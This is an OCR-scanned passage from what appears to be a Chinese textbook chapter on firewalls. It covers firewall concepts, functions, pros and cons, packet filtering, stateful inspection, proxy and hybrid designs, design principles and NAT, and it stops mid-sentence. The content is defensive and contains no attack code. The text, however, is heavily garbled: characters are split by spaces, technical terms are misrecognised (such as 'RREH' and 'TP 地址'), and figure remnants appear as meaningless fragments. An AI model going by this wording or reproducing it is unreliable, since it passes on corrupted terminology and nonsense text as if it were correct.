机 领域 中 的 防火 墙 功能 就 像 现实 中 的 防火 墙 一 样 ,把 绝 大 多 数 外 来 侵害 
都 挡 在 外 面 ,保护 计算 机 的 安全 。 


11.1.1 防火 墙 的 基本 概念 


1. 概念 


防火 墙 通常 是 指 设置 在 不 同 网 络 (如 可 信任 的 企业 内 部 网 和 不 可 信 
的 公共 网 ) 或 网 络 安全 域 之 间 的 一 系列 部 件 的 组 合 ( 包 括 硬 件 和 软件 ) 。 
它 是 不 同 网 络 或 网 络 安全 域 之 间 信 息 的 唯一 出 入口 ,能 根据 企业 的 安全 
政策 控制 (人 允许、 拒绝 ,监测 ) 出 和 网络 的 信息 流 , 且 本 身 具 有 较 强 的 抗 攻 
击 能 力 。 它 是 提供 信息 安全 服务 ,实现 网 络 和 信息 安全 的 基础 设施 。 

在 逻辑 上 ,防火 墙 是 一 个 分 离 器 ,是 一 个 限制 器 ,也 是 一 个 分 析 器 ， 
有 效 地 监控 了 内 部 网 与 Internet 之 间 的 任何 活动 ,保证 了 内 部 网 络 的 安 
全 ,如 图 11-1 所 示 。 


1 
1 
I 
I 
I 
1 
1 
1 
1 
I 
1 
1 
1 


1 外 部 网 《不 可 信和 网络) 


1 
和 


图 11-1 防火 墙 逻 辑 位 置 示意 图 


由 于 防火 墙 设 定 了 网 络 边 界 和 服务 ,因此 更 适合 于 相对 独立 的 网 
络 , 例 如 Intranet 等 。 防 火 墙 成 为 控制 对 网 络 系统 访问 的 非常 流行 的 方 
法 。 事 实 上 .在 Internet 上 的 Web 网 站 中 ,超过 三 分 之 一 的 Web 网 站 都 
是 由 某 种 形式 的 防火 墙 加 以 保护 ,这 是 对 黑客 防范 最 严格 .安全 性 较 强 


的 一 种 方式 ,任何 关键 性 的 服务 器 都 应 放 在 防火 墙 之 后 。 
2. 相关 术语 


下 面 说 明 与 防火 墙 有 关 的 概念 。 

(1) 主机 : 与 网 络 系统 相连 的 计算 机 系统 。 

(2) RREH: 指 一 个 计算 机 系统 , 它 对 外 部 网 络 暴露 ,同时 又 是 内 部 网 络 用 户 的 主要 
连接 点 ,所 以 很 容易 被 侵入 ,因此 必须 严密 保护 堡垒 主 机 。 

(3) 双 宿 主 主机 : 又 称 双 宿主 机 或 双 穴 主机 ,是 具有 两 个 网 络 接口 的 计算 机 系统 ,如 
图 11-2 所 示 。 


图 11-2 双 宿 主 主机 


(4) 包 : 在 互联 网 上 进行 通信 的 基本 数据 单位 。 

(5) 包 过 滤 : 设备 对 进出 网 络 的 数据 流 ( 包 ) 进 行 有 选择 的 控制 与 操作 。 通 常 是 对 从 外 
部 网 络 到 内 部 网 络 的 包 进 行 过 滤 。 用 户 可 设 定 一 系列 的 规则 ,指定 允许 (或 拒绝 ) 哪 些 类 型 
的 数据 包 流 入 (或 流出 ) 内 部 网 络 。 

(6) 参数 网 络 : 为 了 增加 一 层 安全 控制 ,在 内 部 网 与 外 部 网 之 间 增 加 的 一 个 网 络 , 有 时 
也 称 为 中 立 区 ( 非 军事 区 ), 即 DMZ(Demilitarized Zone) ,如 图 11-3 所 示 。 
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图 11-3 DMZ 


CO 代理 服务 器 : 代表 内 部 网 络 用 户 与 外 部 服务 器 进行 数据 交换 的 计算 机 (软件 ) 系 
统 , 它 将 已 认可 的 内 部 用 户 的 请 求 送 达 外 部 服务 器 ,同时 将 外 部 网 络 服务 器 的 响应 再 回 送 给 
用 户 , 如 图 11-4 所 示 。 
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11.1.2 防火 墙 的 功能 


防火 墙 能 增强 内 部 网 络 的 安全 性 ,加 强 网 络 间 的 访问 控制 ,防止 外 部 用 户 非法 使 用 内 部 
网 络 资源 ,保护 内 部 网 络 不 被 破坏 ,防止 内 部 网 络 的 敏感 数据 被 窃取 。 防 火 墙 系统 可 决定 外 
界 可 以 访问 哪些 内 部 服务 以 及 内 部 人 员 可 以 访问 哪些 外 部 服务 。 

一 般 来 说 ,防火 墙 应 该 具备 以 下 功能 。 

CD 支持 安全 策略 。 即 使 在 没有 其 他 安全 策略 的 情况 下 ,也 应 该 支持 “除非 特别 许可 ， 
否则 拒绝 所 有 的 服务 ”的 设计 原则 。 

(2) 易于 扩充 新 的 服务 和 更 改 所 需 的 安全 策略 。 

(3) 具有 代理 服务 功能 (例如 FTP、Telnet 等 ) ,包含 先进 的 鉴别 技术 。 

CD 采用 过 滤 技 术 ,根据 需求 允许 或 拒绝 某 些 服务 。 

(5) 具有 灵活 的 编程 语言 ,界面 友好 , 且 具 有 很 多 过 滤 属 性 ,包括 源 和 目的 TP 地址 、 协 
WFW WA H HY TCP/UDP 端口 以 及 进入 和 输出 的 接口 地 址 。 

(6) 具有 缓冲 存储 的 功能 ,提高 访问 速度 。 

(7) 能 够 接纳 对 本 地 网 的 公共 访问 ,对 本 地 网 的 公共 信息 服务 进行 保护 ,并 根据 需要 删 
减 或 扩充 。 

(8) 具有 对 拨号 访问 内 部 网 的 集中 处 理 和 过 滤 能 力 。 

(9) 具有 记录 和 审计 功能 ,包括 允许 等 级 通信 和 记录 可 以 活动 的 方法 ,便于 检查 和 审计 。 

(10) 防火 墙 设备 上 所 使 用 的 操作 系统 和 开发 工具 都 应 该 具备 相当 等 级 的 安全 性 。 

AD 防火 墙 应 该 是 可 检验 和 可 管理 的 。 


11.1.3 防火 墙 的 优 缺 点 


1. 防火 墙 的 优点 


Internet 防火 墙 负责 管理 Internet 和 内 部 网 络 之 间 的 访问 。 在 没有 防火 墙 时 ,内 部 网 
络 上 的 每 个 节点 都 暴露 给 Internet 上 的 其 他 主机 , 极 易 受到 攻击 。 这 就 表明 内 部 网 络 的 安 
全 性 要 由 每 一 个 主机 的 坚固 程度 来 决定 ,并 且 安全 性 等 同 于 其 中 最 弱 的 系统 。 

防火 墙 具 有 如 下 优点 。 

(1) 集中 的 网 络 安全 。 

(2) 可 作为 中 心 “ 扼 制 点 ”。 

G) 产生 安全 报警 。 

(4) 监视 并 记录 Internet 的 使 用 。 

(5) NAT 的 理想 位 置 。 

(6) WWW fl FTP 服务 器 的 理想 位 置 。 

Internet 防火 墙 允许 网 络 管理 员 定义 一 个 中 心 * 扼 制 点 ?来 防止 非法 用 户 ,如 黑客 、 网 络 
破坏 者 等 进入 内 部 网 络 。 禁 止 存在 安全 脆弱 性 的 服务 进出 网 络 ,并 抗击 来 自 各 种 路 线 的 攻 
击 。Internet 防火 墙 能 够 简化 安全 管理 ,网 络 安全 性 是 在 防火 墙 系统 上 得 到 加 固 ,而 不 是 分 


布 在 内 部 网 络 的 所 有 主机 上 。 

在 防火 墙 上 可 以 很 方便 地 监视 网 络 的 安全 性 ,并 产生 报警 。 应 该 注意 的 是 ,对 一 个 内 部 
网 络 已 经 连接 到 Internet 上 的 机 构 来 说 ,重要 的 问题 并 不 是 网 络 是 否 会 受到 攻击 ,而 是 何 时 
会 受到 攻击 。 网 络 管理 员 必 须 审 计 并 记录 所 有 通过 防火 墙 的 重要 信息 。 如 果 网 络 管理 员 不 
能 及 时 响应 报警 并 审查 常规 记录 ,防火 墙 就 形同虚设 。 在 这 种 情况 下 ,网 络 管理 员 永 远 不 会 
知道 防火 墙 是 否 受到 攻击 。 

过 去 的 几 年 里 ,Internet 经 历 了 地 址 空间 的 危机 ,使 得 TP 地 址 越 来 越 少 。 这 意味 着 想 
进入 Internet 的 机 构 可 能 申请 不 到 足够 的 IP 地 址 来 满足 其 内 部 网 络 上 用 户 的 需要 。 
Internet 防火 墙 可 以 作为 部 署 NAT(Network Address Translator, 网 络 地 址 变换 ) 的 逻辑 
地 址 。 因 此 防火 墙 可 以 用 来 缓解 地 址 空间 短缺 的 问题 ,并 消除 机 构 在 变换 ISP 时 带 来 的 重 
新 编 址 的 麻烦 。 

Internet 防火 墙 是 审计 和 记录 Internet 使 用 量 的 一 个 最 佳 地 方 。 网 络 管理 员 可 以 在 此 
向 管理 部 门 提供 Internet 连接 的 费用 情况 , 查 出 潜在 的 带宽 瓶颈 的 位 置 ,并 能 够 根据 机 构 的 
核算 模式 提供 部 门 级 的 计 费 。 

Internet 防火 墙 也 可 以 成 为 向 客户 发 布 信息 的 地 点 。Internet 防火 墙 作为 部 署 WWW 
服务 器 和 FTP 服务 器 的 地 点 非常 理想 。 还 可 以 对 防火 墙 进行 配置 ,允许 Internet 访问 上 述 
服务 ,而 禁止 外 部 对 受 保护 的 内 部 网 络 上 其 他 系统 的 访问 。 

也 许 会 有 人 说 ,部 署 防火 墙 会 产生 单一 失效 点 。 但 应 该 强调 的 是 ,即使 到 Internet 的 连 
接 失 效 ,内 部 网 络 仍旧 可 以 工作 ,只 是 不 能 访问 Internet 而 已 。 如 果 存 在 多 个 访问 点 ,每 个 
点 都 可 能 受到 攻击 ,网 络 管理 员 必 须 在 每 个 点 设置 防火 墙 并 经 常 监视 。 


2. 防火 墙 的 缺点 


防火 墙 内 部 网 络 可 以 在 很 大 程度 上 免 受 攻 击 。 但 是 ,所 有 的 网 络 安全 问题 不 是 都 可 以 
通过 简单 地 配置 防火 墙 来 解决 。 虽然 当 单位 将 其 网 络 互 连 时 ,防火 墙 是 网 络 安 全 重要 的 一 
环 ,但 并 非 全 部 。 许 多 危险 是 在 防火 墙 能 力 范 围 之 外 的 。 

CD 不 能 防止 来 自 内 部 变节 者 和 不 经 心 的 用 户 们 带 来 的 威胁 。 防 火 墙 无 法 禁止 变节 者 
或 公司 内 部 存在 的 间谍 将 敏感 数据 拷贝 到 软盘 或 磁盘 上 ,并 将 其 带 出 公司 。 防 火 墙 也 不 能 
防范 伪装 成 超级 用 户 或 诈 称 新 员工 劝说 没有 防范 心理 的 用 户 公开 口令 或 授予 其 临时 的 网 络 
访问 权限 。 所 以 必须 对 员工 们 进行 教育 ,让 他 们 了 解 网 络 攻击 的 各 种 类 型 ,并 懂得 保护 自己 
的 用 户口 令 和 周期 性 变换 口令 的 必要 性 。 

(2) 无 法 防范 通过 防火 墙 以 外 的 其 他 途径 的 攻击 。 防 火 墙 能 够 有 效 地 防止 通过 它 进行 
传输 的 信息 ,但 不 能 防止 不 通过 它 而 传输 的 信息 。 例 如 ,在 一 个 被 保护 的 网 络 上 有 一 个 没有 
限制 的 氢 出 存在 ,内 部 网 络 上 的 用 户 就 可 以 直接 通过 SLIP 或 PPP 连接 进入 Internet, Hš 
明 的 用 户 可 能 会 对 需要 附加 认证 的 代理 服务 器 感到 厌烦 ,因而 向 ISP 购买 直接 的 SLIP 或 
PPP 连接 ,从 而 试图 绕 过 由 精心 构造 的 防火 墙 系统 提供 的 安全 系统 。 这 就 为 从 后 门 攻 击 创 
造 了 极 大 的 可 能 。 网 络 上 的 用 户 们 必须 了 解 这 种 类 型 的 连接 对 于 一 个 有 全 面 的 安全 保护 系 
统 来 说 是 绝对 不 允许 的 。 

(3) 不 能 防止 传送 已 感染 病毒 的 软件 或 文件 。 这 是 因为 病毒 的 类 型 太 多 ,操作 系统 也 
有 多 种 ,编码 与 压缩 二 进 制 文件 的 方法 也 各 不 相同 。 所 以 不 能 期 望 Internet 防火 墙 去 对 每 


实践 


一 个 文件 进行 扫描 , 查 出 潜在 的 病毒 。 对 病毒 特别 关心 的 机 构 应 在 每 个 桌面 部 署 防 病毒 软 
件 , 防 止 病毒 从 软盘 或 其 他 来 源 进入 网 络 系统 。 
(4) 无 法 防范 数据 驱动 型 的 攻击 。 数 据 驱动 型 的 攻击 从 表面 上 看 是 无 害 的 数据 被 邮寄 
或 拷贝 到 Internet 主机 上 。 但 一 旦 执行 就 开 成 攻击 。 例 如 一 个 数据 型 攻击 可 能 导致 主机 修 
改 与 安全 相关 的 文件 ,使 得 和 人 侵 者 很 容易 获得 对 系统 的 访问 权 。 例 如 ,在 堡垒 主机 上 部 署 代 
理 服务 器 是 禁止 从 外 部 直接 产生 网 络 连接 的 最 佳 方式 ,并 能 减少 数据 驱动 型 攻击 的 威胁 。 


11.2 防火 墙 的 工作 方式 


防火 墙 按 工作 方式 可 以 分 为 硬件 方式 .软件 方式 以 及 软 硬 件 混合 方式 ,如 图 11-5 所 示 。 
下 面 进行 简单 介绍 。 


路 出 器 
202.100.X.X 
防火 增 
192.168.X.X 


数据 库 ZEE 2 = 
服务 器 


È 
| 
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图 11-5 防火 墙 的 工作 方式 示意 图 


11.2.1 硬件 方式 


硬件 防火 墙 是 在 内 部 网 与 Internet 之 间 放 置 的 一 台 硬 件 设备 ,可 以 隔离 或 过 滤 外 部 人 
员 对 内 部 网 络 的 访问 ,如 图 11-6 所 示 。 
采用 上 述 安 装 ,可 以 根据 自己 的 网 络 设计 及 <= 
应 用 配置 防火 墙 阻止 来 自 外 部 的 破坏 性 攻击 。 ^ 
=== T' 


11.2.2 软件 方式 
采用 软件 方式 也 可 以 保护 内 部 网 络 不 受 外 来 


用 户 的 攻击 。 在 Web 主机 上 或 单独 一 台 计 算 机 
上 运行 这 一 类 软件 监测 、 侦 听 来 自 网 络 上 的 信息 ， 图 11-6 硬件 防火 雯 


对 访问 内 部 网 的 数据 起 到 过 滤 作 用 ,从 而 保护 内 部 网 免 受 破坏 。 这 类 软件 中 ,最 常用 的 是 代 
理 服务 器 软件 。 

在 代理 方式 下 ,私有 网 络 的 数据 包 从 来 不 能 直接 进入 互联 网 ,而 是 需要 经 过 代理 的 处 
理 。 同 样 , 外 部 网 的 数据 也 不 能 直接 进入 私有 网 ,而 是 要 经 过 代理 处 理 以 后 才能 到 达 私有 
网 ,因此 在 代理 上 就 可 以 进行 访问 控制 ,地 址 转换 等 功能 。 

图 11-7 所 示 是 使 用 代理 服务 器 的 工作 示意 图 。 


=== £ 


B = s 


图 11-7 使 用 代理 服务 器 的 工作 示意 图 


11.2.3 混合 方式 


一 套 完整 的 防火 墙 系统 通常 由 屏蔽 路 由 器 和 代理 服务 器 组 成 。 屏 项 路 由 器 和 代理 服务 
器 通常 组 合 在 一 起 构成 混合 系统 ,其 中 屏蔽 路 由 器 主要 用 于 防止 IP 欺骗 攻击 。 而 代理 服务 
器 是 防火 墙 中 的 一 个 服务 器 进程 , 它 能 够 代替 网 络 用 户 完成 特定 的 TCP/IP 功能 。 


11.3 了 防火墙 的 工作 原理 


1. 分 组 过 滤 型 防火 墙 


分 组 过 滤 或 包 过 滤 是 一 种 通用 、 廉 价 有 效 的 安全 手段 。 之 所 以 通用 ,是 因为 它 不 针对 
各 具体 的 网 络 服务 采取 特殊 的 处 理 方式 ; 之 所 以 廉价 ,因为 大 多 数 路 由 器 都 提供 分 组 过 滤 功 
能 ; 之 所 以 有 效 ,因为 它 能 很 大 程度 地 满足 企业 的 安全 要 求 。 包 过 滤 规 则 一 般 存 放 于 路 由 器 
的 ACL 中 ,在 ACL 中 定义 了 各 种 规则 来 表明 是 否 同意 或 拒绝 数据 包 的 通过 ,如 图 11-8 所 示 。 


Dem 
服务 器 A | 
内 部 网 络 
mis ， 包 过 滤 路 由 器 防火 墙 结构 


包 过 滤 在 网 络 层 和 传输 层 起 作用 , 它 根 据 分 组 包 的 源 、 宿 地 址 ,端口 号 及 协议 类 型 .标志 
定 是 否 允 许 分 组 包 通过 ,所 根据 的 信息 来 源 于 IP TCP 或 UDP 包头 ,如 图 11-9、 图 11-10 所 示 。 


实践 


MOL 数据 包 [E ES EI 
(例如 HDLC) | (CIP 头 部 ) |( 例 如 TCP 头 部 ) 


目的 端 11 号 


目的 [P 地 址 ACL 规 则 


源 IP 地 址 
封装 协议 


图 11-9 ACL 对 数据 包 的 过 滤 


ZEE EH 
ACL 吗 ? 


数据 包 到 达 
防火 墙 接口 


- 转发 给 接口 


图 11-10 ACL 处 理 入 数据 包 的 过 程 


包 过 滤 的 优点 是 不 用 改动 客户 机 和 主机 上 的 应 用 程序 ,因为 它 工作 在 网 络 层 和 传输 层 ， 
与 应 用 层 无 关 。 但 其 弱点 也 是 明显 的 , 据 以 过 滤 判 别 的 只 有 网 络 层 和 传输 层 的 有 限 信息 , 因 
而 各 种 安全 要 求 不 可 能 充分 满足 ; 在 许多 过 滤器 中 ,过滤 规则 的 数目 是 有 限制 的 , 且 随 着 规 
则 数目 的 增加 ,性 能 会 受到 很 大 的 影响 ; 由 于 缺少 上 下 文 关 联 信 息 , 不 能 有 效 过 滤 如 UDP. 
RPC 一 类 的 协议 ; 另外 ,大 多 数 过 滤器 中 缺少 审计 和 报警 机 制 , 且 管理 方式 和 用 户 界 面 较 
差 ; 对 安全 管理 人 员 素质 要 求 高 ,建立 安全 规则 时 ,必须 对 协议 本 身 及 其 在 不 同 应 用 程序 中 
的 作用 有 较 深入 的 理解 。 因 此 ,过 滤器 通常 是 与 应 用 网 关 配 合 使 用 ,共同 组 成 防火 墙 系统 。 

有 状态 包 过 滤 也 叫 状态 包 检 查 SPI(State-fulPacket Inspection) 或 者 动态 包 过 滤 
(Dynamic packet filter) ,后 来 发 展 成 为 包 状 态 监 测 技 术 , 它 是 包 过 滤器 和 应 用 级 网 关 的 一 
种 折衷 方案 ,具有 包 过 滤 机 制 的 速度 和 灵活 ,也 有 应 用 级 网 关 的 应 用 层 安 全 的 优点 。 采 用 
SPI 技术 的 防火 墙 除了 有 一 个 过 滤 规 则 集 外 .还 要 对 通过 它 的 每 一 个 连接 都 进行 跟踪 ,汲取 
相关 的 通信 和 应 用 程序 的 状态 信息 ,形成 一 个 当前 连接 的 状态 列表 。 列 表 中 至 少 包括 源 和 
目的 人 P 地 址 , 源 和 目的 端口 号 、TCP 序列 号 信息 ,以 及 与 那个 特定 会 话 相关 的 每 条 TCP/ 


UDP 连接 的 附加 标记 。 当 一 个 会 话 经 过 防火 墙 时 ,SPI 防火 墙 把 数据 包 与 状态 表 、 规 则 集 
进行 对 比 , 只 允许 与 状态 表 和 规则 集 匹配 的 项 通过 ,如 图 11-11 Bros o 


规则 集 是 省 允 
许 数据 亿 的 内 
容 通 过 


数据 包 的 内 容 足 


: 记录 
Pa MN 生机 发 送 ICMP 消 息 


建立 连接 项 


图 11-11 SPI 防火 墙 的 处 理 过 程 


在 维护 了 一 张 状 态 表 后 ,防火墙 就 可 以 利用 更 多 的 信息 来 决定 是 否 允 许 数据 包 通 过 ,大 
大 降低 了 把 数据 包 伪 装 成 一 个 正在 使 用 的 连接 的 一 部 分 的 可 能 性 。 

SPI 防火 墙 能 够 对 特定 类 型 数据 包 的 数据 进行 检测 。 如 运行 FTP 协议 的 服务 器 和 客 
户 端 程序 有 许多 漏洞 ,其 中 一 部 分 漏洞 来 源 于 不 正确 的 请 求 或 者 不 正确 的 命令 。 

SPI 防火 墙 不 行使 代理 功能 , 既 不 在 源 主机 和 目的 之 间 建 立 中 转 连接 ; 也 不 提供 与 应 
用 层 网 关 相 同 程度 的 保护 ,而 是 仅 在 数据 包 的 数据 部 分 查找 特定 的 字符 串 。 

【 例 11-1】 主机 A 试图 访问 www. sohu. com, 它 必须 通过 路 由 器 ,而 该 路 由 器 被 配置 
成 SPI 防火 墙 ,下 面 是 主机 A 发 出 连接 请 求 的 工作 过 程 ,示意 如 图 11-12 所 示 。 

O A 发 出 连接 请 求 到 www. sohu. com, 

© 请 求 到 达 路 由 器 ,路 由 器 检查 状态 表 。 

@ 如 果 有 连接 存在 , 且 状 态 表 正常 ,允许 数据 ， 


步骤 (5) € Internet —— 
包 通 过 。 =. a 


D 如 果 无 连接 存在 ,创建 状态 项 ,将 请 求 与 防 jy as 
火 墙 规则 集 进行 比较 。 A h rm 
© 如 果 规则 允许 内 部 主机 可 以 访问 TCP/SO. ppp) | m IRG 
则 允许 数据 包 通 过 。 步骤 (9) | Ë | mn 
© 数据 包 被 Web 服务 器 接收 。 步骤 O) p 


@ SYN/ACK 信息 回 到 路 由 器 ,路 由 器 检查 状 
态 表 。 Xl 


状态 表 正 确 , 人 允许 数据 包 通过 ,数据 包 到 达 


最 先 发 出 请 求 的 计算 机 。 图 11-12 主机 发 出 连接 请 求 
通过 SPI 防火 墙 


实践 


© 如 果 规 则 不 允许 内 部 主机 访问 TCP/80, 则 禁止 数据 包 通 过 ,路 由 器 发 送 ICMP 
消息 。 
SPI 防火 墙 具 有 识别 带 有 欺骗 性 源 TP 地 址 包 的 能 力 ; 检查 的 层面 能 够 从 网 络 层 至 应 用 
B: 具有 详细 记录 通过 的 每 个 包 的 信息 的 能 力 , 其 中 包括 应 用 程序 对 包 的 请 求 .连接 的 持续 
时 间 、 内 部 和 外 部 系统 所 做 的 连接 请 求 等 。 但 是 所 有 这 些 记录 ,测试 和 分 析 工 作 都 可 能 
会 造成 网 络 连接 的 某 种 迟滞 ,特别 是 在 同时 有 许多 连接 激活 的 时 候 , 或 者 是 有 大 量 的 过 滤 
网 络 通信 的 规则 存在 时 。 硬 件 速度 越 快 ,这 个 问题 就 越 不 易 察觉 。 网 络 结构 如 图 11-13 
所 示 。 


y Clie 


图 11-13 ”代理 服务 器 防火 墙 


代理 服务 器 (Proxy Server) 防 火 墙 是 基于 软件 的 。 它 工作 在 OSI 模型 的 最 高 层 ,掌握 
着 应 用 系统 中 可 用 作 安 全 决策 的 全 部 信息 。 运 行 在 内 部 用 户 和 外 部 主机 之 间 , 并 且 在 它们 
之 间 转 发 数据 , 它 像 真 的 墙 一 样 挡 在 内 部 网 和 Internet 之 间 。 从 外 面 来 的 访问 者 只 能 看 到 
代理 服务 器 ,看 不 见 任何 内 部 资源 ; 而 内 部 客户 根本 感觉 不 到 代理 服务 器 的 存在 ,他 们 可 以 
自由 访问 外 部 站 点 。 代 理 可 以 提供 极 好 的 访问 控制 .登录 能 力 以 及 地 址 转换 功能 ,对 进出 防 
火 墙 的 信息 进行 记录 ,便于 管理 员 监 视 和 管理 系统 ,如 图 11-13 所 示 。 

【 例 11-2〗 主机 A 试图 访问 www. sohu. TT 


com, 它 通过 代理 服务 器 到 达 网 关 。 下 面 是 主机 A SRO (meme 

发 出 连接 请 求 的 工作 过 程 如 下 ,示意 如 图 11-14 

所 示 。 PR (7) 
QD 主机 发 出 访问 Web 站 点 的 请 求 。 etis DR (6) 
O 请 求 到 达 代 理 服务 器 ,代理 服务 器 检查 防火 ao) 


墙 规则 集 .数据 报头 信息 和 数据 。 步骤 (1) | 
© 若 不 允许 该 请 求 发 出 ,代理 服务 器 拒绝 请 D P 

OR UR 3X ICMP 消息 给 源 主机 。 Ld b 
@ 若 允 许 该 请 求 发 出 ,代理 服务 器 修改 源 IP 

地 址 ,创建 数据 包 。 图 11-14 ”主机 发 出 连接 请 求 
© 代理 服务 器 将 数据 包 发 给 目的 计算 机 ,数据 通过 SPI 防火 墙 


包 显 示 源 IP 地 址 来 自 代理 服务 器 。 

@ 返回 的 数据 包 又 被 发 送 到 代理 服务 器 。 服 务 器 再 次 根据 防火 墙 规则 集 检查 数据 报 
头 信息 和 数据 。 

D 若 不 允许 该 数据 包 进 入 内 部 网 ,代理 服务 器 丢弃 该 数据 包 ,发 送 ICMP 消息 。 

@ 若 允 许 该 数据 包 进入 内 部 网 ,代理 服务 器 将 它 发 给 最 先 发 出 请 求 的 计算 机 。 

© 数据 包 到 达 最 先 发 出 请 求 的 计算 机 ,此 时 数据 包 显 示 来 自 外 部 主机 ,而 不 是 代理 服 
务 器 。 


2. 混合 型 防火 墙 


混合 型 防火 墙 CHybrid Firewall) 把 包 过 滤 和 代理 服务 等 功能 结合 起 来 ,形成 新 的 防火 
墙 结构 ,所 用 主机 称 堡垒 主机 ,负责 代理 服务 。 各 种 类 型 的 防火 墙 各 有 其 优 缺 点 。 当 前 的 防 
火 墙 产 品 已 不 是 单一 的 包 过 滤 型 或 代理 服务 型 防火 墙 ,而 是 将 各 种 安全 技术 结合 起 来 ,形成 
一 个 混合 的 多 级 的 防火 墙 系统 ,以 提高 防火 墙 的 灵活 型 和 安全 性 。 如 混合 采用 动态 包 过 滤 、 
内 核 透明 技术 、 用 户 认证 机 制 、 内 容 和 策略 感知 能 力 、 内 部 信息 隐藏 防火墙 的 交互 操作 性 及 
智能 日 志 、 审 计 和 实时 报警 ,或 者 将 各 种 安全 技术 结合 等 。 


3. 其 他 类 型 的 防火 墙 


(1) 电路 层 网 关 (Circuit Gateway) 在 网 络 的 传输 层 上 实施 访问 控制 策略 ,是 在 内 、 外 网 
络 主机 之 间 建 立 一 个 虚拟 电路 进行 通信 ,相当 于 在 防火 墙 上 直接 开 了 个 口子 进行 传输 ,不 像 
应 用 层 防火 墙 那样 能 严密 地 控制 应 用 层 的 信息 。 

(2) 应 用 层 网 关 (Application Gateway) 使 用 专用 软件 转发 和 过 滤 特 定 的 应 用 服务 ,如 
Telnet 和 FTP 等 服务 连接 。 这 是 一 种 代理 服务 ,代理 服务 技术 适应 于 应 用 层 , 它 由 一 个 高 
层 的 应 用 网 关 作为 代理 器 ,通常 由 专门 的 硬件 来 承担 。 代 理 服务 器 在 接受 外 来 的 应 用 控制 
的 前 提 下 使 用 内 部 网 络 提供 的 服务 。 也 就 是 说 , 它 只 允许 代理 的 服务 通过 , 即 只 有 那些 被 认 
为 “可 信赖 的 ”服务 才 允 许 通过 防火 墙 。 应 用 层 网 关 有 登记 日志 、 统 计 和 报告 等 功能 ,并 有 
很 好 的 审计 功能 和 严格 的 用 户 认证 功能 ,应 用 层 网 关 的 安全 性 高 ,但 它 要 为 每 种 应 用 提供 专 
门 的 代理 服务 程序 。 

(3) 自 适 应 代理 技术 (Self-Adaptive Agent Technology) 是 一 种 新 颖 的 防火 墙 技术 ,在 
一 定 程度 上 反映 了 防火 墙 目 前 的 发 展 动态 。 该 技术 可 以 根据 用 户 定义 的 安全 策略 动态 适应 
传送 中 的 分 组 流量 ,如 果 安 全 要 求 较 高 , 则 安全 检查 应 在 应 用 层 完成 ,以 保证 代理 防火 墙 的 
最 大 安全 性 ; 一 旦 代理 明确 了 会 话 的 所 有 细节 ,其 后 的 数据 包 就 直接 到 达 速 度 快 得 多 的 网 
络 层 。 该 技术 兼备 了 代理 技术 的 安全 性 和 其 他 技术 的 高 效率 。 

各 种 防火 墙 的 性 能 比较 如 表 11-1 所 示 。 


表 11-1 各 种 防火 墙 性 能 比较 


性 能 eui 应 用 网 关 代理 服务 电路 层 网 关 自 适 应 代理 技术 
工作 层次 网 络 层 应 用 层 应 用 层 网 络 层 网 络 层 或 应 用 层 
效率 最 高 低 最 低 高 自 适应 
安全 最 低 高 最 高 低 自 适应 


实践 


续 表 
类 型 

性 能 包 过 滤 应 用 网 关 代理 服务 电路 层 网 关 自 适应 代理 技术 
根本 机 制 过 滤 过 滤 代理 代理 过 滤 或 代理 

内 部 信息 无 无 有 有 有 
高 层 数据 理解 无 有 有 无 有 
支持 应 用 所 有 标准 应 用 标准 应 用 所 有 标准 应 用 ( 易 扩 展 ) 
UDP 支持 无 有 有 无 有 


11.4 防火 墙 的 设计 原则 


当 进 行 防火 墙 设计 时 ,需要 从 以 下 几 个 方面 进行 考虑 。 
1. 防火 墙 的 基本 准则 


防火 墙 可 以 采取 如 下 两 种 截然 不 同 的 基本 准则 。 

CD “拒绝 一 切 未 被 允许 的 东西 >。 这 一 准则 的 含义 是 ,防火 墙 应 该 先 封锁 所 有 信息 流 
的 出 入 ,然后 只 对 所 希望 的 服务 或 应 用 程序 逐 项 解除 封锁 。 由 于 防火 墙 只 支持 相关 的 服务 ， 
因此 ,通过 这 个 准则 ,可 以 创建 相对 安全 的 环境 。 但 这 种 准则 的 整 端 是 , 它 使 用 了 最 大 程度 
的 限制 以 保证 系统 的 安全 ,因而 限制 了 用 户 可 选择 的 服务 范围 。 

(2)“ 允 许 一 切 未 被 特别 拒绝 的 东西 >。 这 一 准则 的 含义 是 ,防火 墙 可 以 转发 所 有 信息 
流 , 然 而 要 对 可 能 造成 危害 的 服务 进行 删除 。 这 种 方法 比 前 一 种 方法 显得 更 灵活 一 些 , 可 使 
用 户 得 到 更 多 的 服务 。 但 其 弊端 是 网 管 人 员 任 务 太 繁重 ,他 必须 知道 哪些 服务 应 该 被 禁止 ， 
有 时 对 禁止 的 内 容 可 能 掌控 并 不 全 面 。 


2. 机 构 的 安全 策略 


防火 墙 并 不 是 孤立 的 , 它 是 一 个 系统 安全 中 不 可 分 割 的 组 成 部 分 。 安 全 政策 必须 建 
立 在 认真 的 安全 分 析 、 风 险 评估 和 商业 需要 分 析 的 基础 之 上 。 如 果 一 个 机 构 没 有 一 项 完 
备 的 安全 策略 ,大 多 数 精心 制作 的 防火 墙 都 可 能 形同虚设 ,使 整个 内 部 网 络 暴露 给 攻 
击 者 。 


3. 防火 墙 的 费用 


防火 墙 的 费用 取决 于 它 的 复杂 程度 以 及 要 保护 的 系统 规模 。 一 个 简单 的 包 过 滤 式 防火 
墙 可 能 费用 最 低 ,因为 包 过 滤 本 身 就 是 路 由 器 标准 功能 的 一 部 分 ,也 就 是 说 一 台 路 由 器 本 身 
就 是 一 个 可 以 作为 防火 墙 的 设备 。 在 商业 里 ,为 了 使 公司 内 部 机 密 更 加 严 紧 ,需要 专门 购买 
较 好 的 安全 设备 ,但 这 些 设备 的 价格 非常 高 。 有 些 网 管理 在 主机 上 使 用 一 些 安全 软件 ,虽然 
没有 设备 价格 的 昂贵 ,但 软件 会 占用 系统 资源 ; 且 还 要 定期 升级 ,这 都 需要 一 批 昂贵 的 
费用 。 


11.5 防火 墙 的 NAT 功能 


1. NAT 技术 


NAT(Network Address Translation), 即 网 络 地 址 转换 。NAT 的 最 初 应 用 主要 是 把 
私有 地 址 转换 为 公有 地 址 ,用 于 解决 互联 网 IPv4 地 址 空间 的 荐 乏 问题 。 

随 着 其 应 用 的 普及 ,NAT 技术 也 有 了 其 他 方面 的 功能 及 作用 ,如 在 进行 地 址 转换 的 同 
时 ,NAT 可 以 保护 内 部 网 络 ,由 于 内 部 使 用 私有 TP 地 址 ,使 得 公 网 无 法 发 起 对 内 部 的 私有 
